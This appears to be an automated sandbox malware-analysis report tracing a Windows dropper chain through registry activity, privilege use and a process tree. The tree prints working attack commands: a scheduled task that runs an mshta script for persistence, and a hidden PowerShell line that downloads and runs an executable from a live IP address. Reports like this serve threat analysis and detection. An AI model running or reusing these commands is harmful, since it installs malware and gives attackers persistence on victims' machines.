\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3528 timeout.exe 17328 timeout.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 342 Go-http-client/1.1 -
Kills process with taskkill 3 IoCs
pid Process 14116 taskkill.exe 7624 taskkill.exe 7892 taskkill.exe -
Modifies registry class 31 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3446877943-4095308722-756223633-1000\{8C5DB0E4-1CAC-4732-97B9-3FDDAE7D7DA4} explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 explorer.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3446877943-4095308722-756223633-1000\{C6ABBDD1-2CBD-45B0-8607-C95DEAD2E178} explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData\Microsoft.MicrosoftStickyNotes_8wekyb3d8 = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHos = 6801000088020000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\PersistedTitleBarData explorer.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\MuiCache SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (data) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2528 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6276 schtasks.exe 3304 schtasks.exe 5376 schtasks.exe 6800 SCHTASKS.exe 5152 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 55 IoCs
pid Process 3196 powershell.exe 3196 powershell.exe 4732 Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE 4732 Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE 3572 rapes.exe 3572 rapes.exe 4336 a500e4f1ae.exe 4336 a500e4f1ae.exe 4336 a500e4f1ae.exe 4336 a500e4f1ae.exe 4336 a500e4f1ae.exe 4336 a500e4f1ae.exe 4336 a500e4f1ae.exe 4336 a500e4f1ae.exe 5368 JqGBbm7.exe 5368 JqGBbm7.exe 844 v6Oqdnc.exe 844 v6Oqdnc.exe 2960 powershell.exe 2960 powershell.exe 844 v6Oqdnc.exe 844 v6Oqdnc.exe 844 v6Oqdnc.exe 844 v6Oqdnc.exe 2396 Bthvgkck.exe 2396 Bthvgkck.exe 844 v6Oqdnc.exe 844 v6Oqdnc.exe 844 v6Oqdnc.exe 844 v6Oqdnc.exe 2396 Bthvgkck.exe 1644 HmngBpR.exe 1644 HmngBpR.exe 2684 SplashWin.exe 5800 SplashWin.exe 5800 SplashWin.exe 5800 SplashWin.exe 1964 powershell.exe 1964 powershell.exe 3076 cmd.exe 3076 cmd.exe 1868 rapes.exe 1868 rapes.exe 3160 s7MG2VL.exe 3160 s7MG2VL.exe 424 RegAsm.exe 424 RegAsm.exe 6728 cronikxqqq.exe 6728 cronikxqqq.exe 6728 cronikxqqq.exe 6728 cronikxqqq.exe 6728 cronikxqqq.exe 6728 cronikxqqq.exe 6728 cronikxqqq.exe 6728 cronikxqqq.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 5800 SplashWin.exe 3076 cmd.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 3196 powershell.exe Token: SeImpersonatePrivilege 4336 a500e4f1ae.exe Token: SeImpersonatePrivilege 4336 a500e4f1ae.exe Token: SeDebugPrivilege 2960 powershell.exe Token: SeImpersonatePrivilege 844 v6Oqdnc.exe Token: SeImpersonatePrivilege 844 v6Oqdnc.exe Token: SeDebugPrivilege 1964 powershell.exe Token: SeDebugPrivilege 424 RegAsm.exe Token: SeDebugPrivilege 6524 cronikxqqq.exe Token: SeImpersonatePrivilege 6728 cronikxqqq.exe Token: SeImpersonatePrivilege 6728 cronikxqqq.exe Token: SeShutdownPrivilege 3524 explorer.exe Token: SeCreatePagefilePrivilege 3524 explorer.exe Token: SeShutdownPrivilege 3524 explorer.exe Token: SeCreatePagefilePrivilege 3524 explorer.exe Token: SeShutdownPrivilege 3524 explorer.exe Token: SeCreatePagefilePrivilege 3524 explorer.exe Token: SeShutdownPrivilege 3524 explorer.exe Token: SeCreatePagefilePrivilege 3524 explorer.exe Token: SeShutdownPrivilege 3524 explorer.exe Token: SeCreatePagefilePrivilege 3524 explorer.exe Token: SeShutdownPrivilege 3524 explorer.exe Token: SeCreatePagefilePrivilege 3524 explorer.exe Token: SeShutdownPrivilege 3524 explorer.exe Token: SeCreatePagefilePrivilege 3524 explorer.exe Token: SeShutdownPrivilege 3524 explorer.exe Token: SeCreatePagefilePrivilege 3524 explorer.exe Token: SeShutdownPrivilege 3524 explorer.exe Token: SeCreatePagefilePrivilege 3524 explorer.exe Token: SeShutdownPrivilege 6612 explorer.exe Token: SeCreatePagefilePrivilege 6612 explorer.exe Token: SeShutdownPrivilege 6612 explorer.exe Token: SeCreatePagefilePrivilege 6612 explorer.exe Token: SeShutdownPrivilege 6612 explorer.exe Token: SeCreatePagefilePrivilege 6612 explorer.exe Token: SeShutdownPrivilege 6612 explorer.exe Token: SeCreatePagefilePrivilege 6612 explorer.exe Token: SeShutdownPrivilege 6612 explorer.exe Token: SeCreatePagefilePrivilege 6612 explorer.exe Token: SeShutdownPrivilege 6612 explorer.exe Token: SeCreatePagefilePrivilege 6612 explorer.exe Token: SeShutdownPrivilege 6612 explorer.exe Token: SeCreatePagefilePrivilege 6612 explorer.exe Token: SeShutdownPrivilege 6612 explorer.exe Token: SeCreatePagefilePrivilege 6612 explorer.exe Token: SeDebugPrivilege 4736 ejrEdhQT0y.exe Token: SeShutdownPrivilege 6612 explorer.exe Token: SeCreatePagefilePrivilege 6612 explorer.exe -
Suspicious use of FindShellTrayWindow 48 IoCs
pid Process 2684 b90944a141.exe 2684 b90944a141.exe 2684 b90944a141.exe 4732 Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE 1220 zY9sqWs.exe 1724 sihost.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe -
Suspicious use of SendNotifyMessage 27 IoCs
pid Process 2684 b90944a141.exe 2684 b90944a141.exe 2684 b90944a141.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 3524 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe 6612 explorer.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 1644 HmngBpR.exe 5416 StartMenuExperienceHost.exe 3948 StartMenuExperienceHost.exe 5600 SearchApp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2684 wrote to memory of 1708 2684 b90944a141.exe 84 PID 2684 wrote to memory of 1708 2684 b90944a141.exe 84 PID 2684 wrote to memory of 1708 2684 b90944a141.exe 84 PID 2684 wrote to memory of 2524 2684 b90944a141.exe 85 PID 2684 wrote to memory of 2524 2684 b90944a141.exe 85 PID 2684 wrote to memory of 2524 2684 b90944a141.exe 85 PID 1708 wrote to memory of 5376 1708 cmd.exe 88 PID 1708 wrote to memory of 5376 1708 cmd.exe 88 PID 1708 wrote to memory of 5376 1708 cmd.exe 88 PID 2524 wrote to memory of 3196 2524 mshta.exe 91 PID 2524 wrote to memory of 3196 2524 mshta.exe 91 PID 2524 wrote to memory of 3196 2524 mshta.exe 91 PID 3196 wrote to memory of 4732 3196 powershell.exe 93 PID 3196 wrote to memory of 4732 3196 powershell.exe 93 PID 3196 wrote to memory of 4732 3196 powershell.exe 93 PID 4732 wrote to memory of 3572 4732 Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE 94 PID 4732 wrote to memory of 3572 4732 Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE 94 PID 4732 wrote to memory of 3572 4732 Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE 94 PID 3572 wrote to memory of 2092 3572 rapes.exe 95 PID 3572 wrote to memory of 2092 3572 rapes.exe 95 PID 3572 wrote to memory of 2092 3572 rapes.exe 95 PID 2092 wrote to memory of 4336 2092 a500e4f1ae.exe 96 PID 2092 wrote to memory of 4336 2092 a500e4f1ae.exe 96 PID 2092 wrote to memory of 4336 2092 a500e4f1ae.exe 96 PID 2092 wrote to memory of 4336 2092 a500e4f1ae.exe 96 PID 2092 wrote to memory of 4336 2092 a500e4f1ae.exe 96 PID 2092 wrote to memory of 4336 2092 a500e4f1ae.exe 96 PID 2092 wrote to memory of 4336 2092 a500e4f1ae.exe 96 PID 2092 wrote to memory of 4336 2092 a500e4f1ae.exe 96 PID 2092 wrote to memory of 4336 2092 a500e4f1ae.exe 96 PID 3572 wrote to memory of 5368 3572 rapes.exe 98 PID 3572 wrote to memory of 5368 3572 rapes.exe 98 PID 3572 wrote to memory of 5368 3572 rapes.exe 98 PID 3572 wrote to memory of 1220 3572 rapes.exe 99 PID 3572 wrote to memory of 1220 3572 rapes.exe 99 PID 3572 wrote to memory of 1220 3572 rapes.exe 99 PID 1220 wrote to memory of 1916 1220 zY9sqWs.exe 100 PID 1220 wrote to memory of 1916 1220 zY9sqWs.exe 100 PID 1220 wrote to memory of 1916 1220 zY9sqWs.exe 100 PID 3572 wrote to memory of 844 3572 rapes.exe 101 PID 3572 wrote to memory of 844 3572 rapes.exe 101 PID 3572 wrote to memory of 844 3572 rapes.exe 101 PID 1916 wrote to memory of 2960 1916 Gxtuum.exe 102 PID 1916 wrote to memory of 2960 1916 Gxtuum.exe 102 PID 1916 wrote to memory of 2396 1916 Gxtuum.exe 105 PID 1916 wrote to memory of 2396 1916 Gxtuum.exe 105 PID 2396 wrote to memory of 2612 2396 Bthvgkck.exe 44 PID 3572 wrote to memory of 1644 3572 rapes.exe 107 PID 3572 wrote to memory of 1644 3572 rapes.exe 107 PID 1644 wrote to memory of 2684 1644 HmngBpR.exe 108 PID 1644 wrote to memory of 2684 1644 HmngBpR.exe 108 PID 1644 wrote to memory of 2684 1644 HmngBpR.exe 108 PID 2684 wrote to memory of 5800 2684 SplashWin.exe 109 PID 2684 wrote to memory of 5800 2684 SplashWin.exe 109 PID 2684 wrote to memory of 5800 2684 SplashWin.exe 109 PID 5800 wrote to memory of 3076 5800 SplashWin.exe 110 PID 5800 wrote to memory of 3076 5800 SplashWin.exe 110 PID 5800 wrote to memory of 3076 5800 SplashWin.exe 110 PID 3572 wrote to memory of 5908 3572 rapes.exe 112 PID 3572 wrote to memory of 5908 3572 rapes.exe 112 PID 5908 wrote to memory of 1964 5908 ADFoyxP.exe 113 PID 5908 wrote to memory of 1964 5908 ADFoyxP.exe 113 PID 5800 wrote to memory of 3076 5800 SplashWin.exe 110 PID 3572 wrote to memory of 2088 3572 rapes.exe 116
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Suspicious use of SetThreadContext
- Modifies registry class
PID:2612 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:424
-
-
C:\Users\Admin\AppData\Local\Temp\b90944a141.exe"C:\Users\Admin\AppData\Local\Temp\b90944a141.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn wqJsBmas7E4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\XzIBGOsmp.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn wqJsBmas7E4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\XzIBGOsmp.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5376
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\XzIBGOsmp.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Users\Admin\AppData\Local\Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE"C:\Users\Admin\AppData\Local\Temp47HELB52JRLZXWTI1J7AZ6PZYDGNEA4S.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4732 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Users\Admin\AppData\Local\Temp\10003000101\a500e4f1ae.exe"C:\Users\Admin\AppData\Local\Temp\10003000101\a500e4f1ae.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Users\Admin\AppData\Local\Temp\10003000101\a500e4f1ae.exe"C:\Users\Admin\AppData\Local\Temp\10003000101\a500e4f1ae.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4336
-
-
-
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5368
-
-
C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
